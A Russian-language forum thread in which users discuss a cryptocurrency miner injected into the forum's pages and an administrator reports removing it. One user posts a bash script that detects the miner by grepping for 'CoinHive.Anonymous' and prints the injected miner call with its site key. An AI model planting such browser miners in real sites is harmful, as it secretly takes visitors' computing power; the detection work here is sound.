Форум вз$лома*&ли и вставили майнер

Тема в разделе "Флудилка", создана пользователем null, 23 сен 2017.

  1. null

    null Нерд

    У все ошибки постоянно выскакивают? Админы даже не пытаются что-то сделать.
     
    ARDUIN-щик, BAR__MEN и Kb498 нравится это.
  2. Kb498

    Kb498 Нерд

    Согласен с вами. Когда я открывал форум высветился диалог:"Это сайт пытается использовать ваш браузер для добычи криптовалюты.Это может создать заметную нагрузку на процессор."
     
  3. Kb498

    Kb498 Нерд

    Согласен с вами. Когда я открывал форум высветился диалог:"Это сайт пытается использовать ваш браузер для добычи криптовалюты. Это может создать заметную нагрузку на процессор."
     
  4. null

    null Нерд

    И мы сделать ничего не можем. Только админы могут что-то то исправить, но они не сильно этого хотт.
     
  5. null

    null Нерд

    И мы сделать ничего не можем. Только админы могут что-то то исправить, но они не сильно этого хотят.
     
  6. Kb498

    Kb498 Нерд

    Вот именно!
     
  7. ARDUIN-щик

    ARDUIN-щик Гик

    Почему все Ваши сообщения двоятся?
    И да, админ один в сети, работа похоже идет...
     
  8. acos

    acos Официальный гик Команда форума

    Приношу извинения за отвратительную работу форума. Ищем проблему. Надеюсь в течении часа починим.
     
    Последнее редактирование: 23 сен 2017
  9. acos

    acos Официальный гик Команда форума

    Пофиксили. Майнера больше нет.
     
    Igor68 нравится это.
  10. null

    null Нерд

    Ура!
     
  11. Kb498

    Kb498 Нерд

    А у меня все равно диалоги всплывают
     
  12. Kb498

    Kb498 Нерд

    И "ерроры" постоянные.
     
  13. Kb498

    Kb498 Нерд

    И "ерроры" постоянные.
     
  14. Airbus

    Airbus Оракул

    Че за хрень этот Майнер?
     
  15. Kb498

    Kb498 Нерд

    Вирус
     
  16. Kb498

    Kb498 Нерд

    Ура! Наконец-то перестало выскакивать
     
  17. Igor68

    Igor68 Гик

    Не вирус конечно... больно просто для вируса. Но вот(имя файла "bjs"):
    Код (Bash):

    #!/bin/bash
    #

    _fname=$1

    echo "===== name of file ====="
    echo "$_fname"
    echo ""

    _datfile=$(cat $_fname)

    echo "===== data of file ====="
    echo "$_datfile"
    echo ""

    echo "===== mine use ===="
    _mstr=$(echo "$_datfile" | grep "CoinHive.Anonymous")
    echo "$_mstr"
     
    это заготовка для фильтра... проба на основе эмоций - индикатор пока, использования внешней библиотеки майнера.
    если запустить так (где имя файла сохранённой страницы сайта "test.html"):
    Код (Bash):

    ./bjs test.html
     
    то будет вывод в самом конце:
    Код (Bash):

    .....
    .....
    .....
    XenForo.Facebook.appId = "";
    XenForo.Facebook.forceInit = false;


    </script>


    <script type="application/ld+json">
    {
      "@context": "http://schema.org",
      "@type": "WebSite",
      "url": "http://forum.amperka.ru/",
      "potentialAction": {
      "@type": "SearchAction",
      "target": "http://forum.amperka.ru/search/search?keywords={search_keywords}",
      "query-input": "required name=search_keywords"
      }
    }
    </script>



    </body>
    </html>

    ===== mine use ====
    var miner = new CoinHive.Anonymous('HqRcfNypnewChJOyojLNSYRLbHuIki9S', {
     
    то есть заточено на функцию CoinHive.Anonymous,
    которая как раз и содержится в загружаемой из URL библиотеке
     
  18. Igor68

    Igor68 Гик

    Одним словом если вызываемая функция есть на странице - вывод будет.
    Вот кусок определения из той библиотеки:
    Код (Javascript):

    window.CoinHive.Anonymous=function(siteKey,params){var miner=new Miner(siteKey,params);
     
    ...файлы библиотеки уже выложены на форуме.
    Это для Вас поклонники JavaScript:)
     
    Последнее редактирование: 24 сен 2017
  19. Igor68

    Igor68 Гик

    Простите!... я сказал... что это слишком просто для вируса. Я "зажрался" - у меня Debian. Для Windows может всё и по другому.
     
    BAR__MEN и Kb498 нравится это.
  20. Kelvin

    Kelvin Гик

    Программа для фарма криптовалют, использует вычислительную мощность компьютеров для закрытия блоков. Один из способов получения денег)
     
    Kb498 нравится это.